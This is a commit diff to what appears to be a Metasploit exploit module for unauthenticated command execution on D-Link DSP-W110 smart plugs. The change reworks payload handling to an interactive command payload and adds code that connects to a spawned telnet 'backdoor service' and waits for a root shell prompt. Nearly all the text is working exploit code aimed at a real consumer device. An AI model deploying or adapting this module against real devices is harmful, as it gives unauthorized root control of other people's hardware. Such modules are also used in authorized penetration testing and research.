cmd_interact - first try

Author: Michael Messner

modules/exploits/linux/http/dlink_dspw110_cookie_noauth_exec.rb

@@ -9,7 +9,6 @@ class Metasploit3 < Msf::Exploit::Remote
   Rank = NormalRanking
 
   include Msf::Exploit::Remote::HttpClient
-  include Msf::Auxiliary::CommandShell
 
   def initialize(info = {})
     super(update_info(info,
@@ -33,13 +32,37 @@ def initialize(info = {})
           ['URL', 'https://github.com/darkarnium/secpub/tree/master/D-Link/DSP-W110'] # blog post including PoC
         ],
       'DisclosureDate' => 'Jun 12 2015',
+      'Platform'       => 'unix',
+      'Arch'        => ARCH_CMD,
+      'Payload'     =>
+        {
+          'Compat'  => {
+            'PayloadType'    => 'cmd_interact',
+            'ConnectionType' => 'find',
+          },
+        },
+      'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' },
       'Targets' =>
         [
           [ 'Automatic',        { } ]
         ],
       'DefaultTarget'    => 0
       ))
 
+    register_advanced_options(
+      [
+        OptInt.new('TelnetTimeout', [ true, 'The number of seconds to wait for a reply from a Telnet command', 10]),
+        OptInt.new('TelnetBannerTimeout', [ true, 'The number of seconds to wait for the initial banner', 25])
+      ], self.class)
+
+  end
+
+  def tel_timeout
+    (datastore['TelnetTimeout'] || 10).to_i
+  end
+
+  def banner_timeout
+    (datastore['TelnetBannerTimeout'] || 25).to_i
   end
 
   def check
@@ -76,33 +99,28 @@ def exploit
 
   def handle_telnet(telnetport)
 
-    begin
-      sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnetport.to_i })
+    sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnetport.to_i })
 
-      if sock
-        print_good("#{peer} - Backdoor service spawned")
-        add_socket(sock)
-      else
-        fail_with(Failure::Unreachable, "#{peer} - Backdoor service not spawned")
-      end
+    if sock
+      print_good("#{peer} - Backdoor service spawned")
+      add_socket(sock)
+    else
+      fail_with(Failure::Unreachable, "#{peer} - Backdoor service not spawned")
+    end
 
-      print_status "Starting a Telnet session #{rhost}:#{telnetport}"
-      merge_me = {
-        'USERPASS_FILE' => nil,
-        'USER_FILE'     => nil,
-        'PASS_FILE'     => nil,
-        'USERNAME'      => nil,
-        'PASSWORD'      => nil
-      }
-      start_session(self, "TELNET (#{rhost}:#{telnetport})", merge_me, false, sock)
-    rescue
-      fail_with(Failure::Unreachable, "#{peer} - Backdoor service not handled")
+    print_status("#{peer} - Trying to establish a telnet session...")
+    prompt = negotiate_telnet(sock)
+    if prompt.nil?
+      sock.close
+      fail_with(Failure::Unknown, "#{peer} - Unable to establish a telnet session")
+    else
+      print_good("#{peer} - Telnet session successfully established...")
     end
-    return
+
+    handler(sock)
   end
 
   def execute_command(cmd)
-
     begin
       res = send_request_cgi({
         'method'        => 'GET',
@@ -114,4 +132,21 @@ def execute_command(cmd)
       fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
     end
   end
+
+  # Since there isn't user/password negotiation, just wait until the prompt is there
+  def negotiate_telnet(sock)
+    begin
+      Timeout.timeout(banner_timeout) do
+        while(true)
+          data = sock.get_once(-1, tel_timeout)
+          return nil if not data or data.length == 0
+          if data =~ /\x23\x20$/
+            return true
+          end
+        end
+      end
+    rescue ::Timeout::Error
+      return nil
+    end
+  end
 end